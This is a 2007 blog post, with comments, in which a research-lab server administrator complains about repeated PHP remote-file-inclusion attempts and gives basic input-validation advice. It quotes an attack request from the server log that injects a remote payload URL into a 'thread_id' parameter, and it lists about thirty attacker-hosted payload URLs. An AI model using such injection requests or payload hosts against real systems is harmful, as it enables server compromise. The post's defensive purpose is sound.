11.16.07

Dumbest Break-in Attempts

Posted in Programming, SAnToS at 3:39 pm by Todd

At work I run a project management server for our research group (the SAnToS Lab). Over the course of my time managing the machine I have had several break-in attempts (about a bijillion times might be a good guess) and a few successful ones. Lately, I think I have come across some of the dumbest script-kiddies on the planet (I feel safe in saying this since nobody, especially them, read this blog).

They are trying to take advantage of php’s ability to include arbitrary URLs (this is a very, very, very common hole in most web applications, not just this particular server or php). This is called code injection and is a reasonable way to crack into systems on the internet. I claim that this particular script-kiddie is dumb because they constantly try the same URL with the same injection URL from the same machine. For example, while watching today I saw 14 straight attempts to access the same URL from the same machine in less than 30 seconds. What kind of idiot writes this type of script? Some idiot that doesn’t understand programming? On the other hand, I am not a security expert so maybe this is some really savy way to break into hardened systems (doubtful but possible).

What’s worse is that it is obvious that the same script is being run on many “zombie” machines. They try to access the same URL, repeatedly, from different machines. I guess they figure that if it didn’t work from 1 machine that it might work from 1,000 machines.

Here is an example of what this looks like in the logs:
74.13.92.186 – - [16/Nov/2007:21:05:46 +0000] “GET /forum/forum.php?thread_id=http://amyru.h18.ru/images/cs.txt? HTTP/1.1″ 200 7994 “-” “Wget/1.1 (compatible; i486; Linux; RedHat7.3)”
And right after that they did 13 more (formatted to show just the times and IPs):
74.13.92.186 – - [16/Nov/2007:21:05:49 +0000]
74.13.92.186 – - [16/Nov/2007:21:05:49 +0000]
74.13.92.186 – - [16/Nov/2007:21:05:54 +0000]
74.13.92.186 – - [16/Nov/2007:21:05:54 +0000]
74.13.92.186 – - [16/Nov/2007:21:05:56 +0000]
74.13.92.186 – - [16/Nov/2007:21:05:57 +0000]
74.13.92.186 – - [16/Nov/2007:21:06:02 +0000]
74.13.92.186 – - [16/Nov/2007:21:06:02 +0000]
74.13.92.186 – - [16/Nov/2007:21:06:02 +0000]
74.13.92.186 – - [16/Nov/2007:21:06:05 +0000]
74.13.92.186 – - [16/Nov/2007:21:06:05 +0000]
74.13.92.186 – - [16/Nov/2007:21:06:08 +0000]
74.13.92.186 – - [16/Nov/2007:21:06:10 +0000]
Here are some of the URLs that they have tried to inject today:
http://garyz.110mb.com/safeon.txt
http://cherrygirl.h18.ru/images/cs.txt
http://jjisdfiuw834wsdd.chat.ru/js
http://kiopmanminsuion.chat.ru/http
http://musicgirll.chat.ru/wav/mysong
http://rumusic.chat.ru/rumusic.wav
http://amygirl.chat.ru/images/image.txt
http://amyru.h18.ru/images/cs.txt
http://cherrygirl.h18.ru/images/cs.txt
http://himanhimanioum.chat.ru/man
http://jjisdfiuw834wsdd.chat.ru/js
http://kiopmanminsuion.chat.ru/http
http://musicgirll.chat.ru/wav/mysong
http://ninaru.hut2.ru/images/cs.txt
http://rumusic.chat.ru/rumusic.wav
http://users2.TitanicHost.com/ninagirl/pb.txt
http://www.voice.ch/uu
http://201.37.71.117:8090/cmd.txt
http://201.37.71.117:8090/cmdimbox.txt
http://garyz.110mb.com/safeon.txt
http://amygirl.3-hosting.net/cs.txt
http://amyru.h18.ru/images/cs.txt
http://jjisdfiuw834wsdd.chat.ru/js
http://kiopmanminsuion.chat.ru/http
http://musicgirll.chat.ru/wav/mysong
http://ninaru.hut2.ru/images/cs.txt
http://rumusic.chat.ru/rumusic.wav
http://www.voice.ch/uu
http://201.37.71.117:8090/cmd.txt
http://201.37.71.117:8090/cmdimbox.txt

Note to script-kiddies: this particular hole was closed 3 years ago when Jesse and I did some routine maintenance. But if think about it a little and get creative, you might find other holes that we failed to find. So please stop pounding the machine with your requests that fail.

Sorry, these script-kiddies are just stupid and are really annoying me today. Rant over.

3 Comments

  1. Dotan Mazor said,

    November 17, 2007 at 11:35 pm

    SAnToS,

    Who knows? maybe they tried to “huff and puff until they blow your house in” :-)

    It appears that you do have readers. And from Israel, nonetheless.

    We have had the same attempts, but not by “dumb” script kiddies. They actually know several access points on our domain, which means that they have managed to squeeze some information out of the server.

    Could you post a reference of the hole that you fixed? Knowing our sys admins, it is already fixed, but I wouldn’t want to crash down because of such an assumption.

    And thank you for your sarcastic article. As they say: some kiddies never die – they just smell that way…

    Dotan

  2. Nothing to see here » PHP include attacks rolling on… said,

    November 19, 2007 at 10:20 am

    [...] I decide to google one of the URL’s that’s included, and right off the bat, I found this article from a web site that’s seeing the same thing.  I believe these attacks are being launched [...]

  3. Todd said,

    November 19, 2007 at 11:56 am

    Dotan

    I don’t have specifics about the holes we patched (it was done a while ago and I didn’t keep notes) but the basic idea was to validate any incoming variables in PHP. Using the example log above, our scripts now check to make sure thread_id is a number. This can be done using the following:

    if(!is_numeric($thread_id)) {
    exit_error(“Invalid thread id”, “The thread id you sent was invalid. Please try again with a valid thread id.”);
    }

    Another thing to do would be to make sure you don’t use the PHP inclusion mechanism for any variables taken in from the user. For example, don’t do something like this:

    require($thread_id);

    Otherwise, good luck. These script-kiddies are really annoying.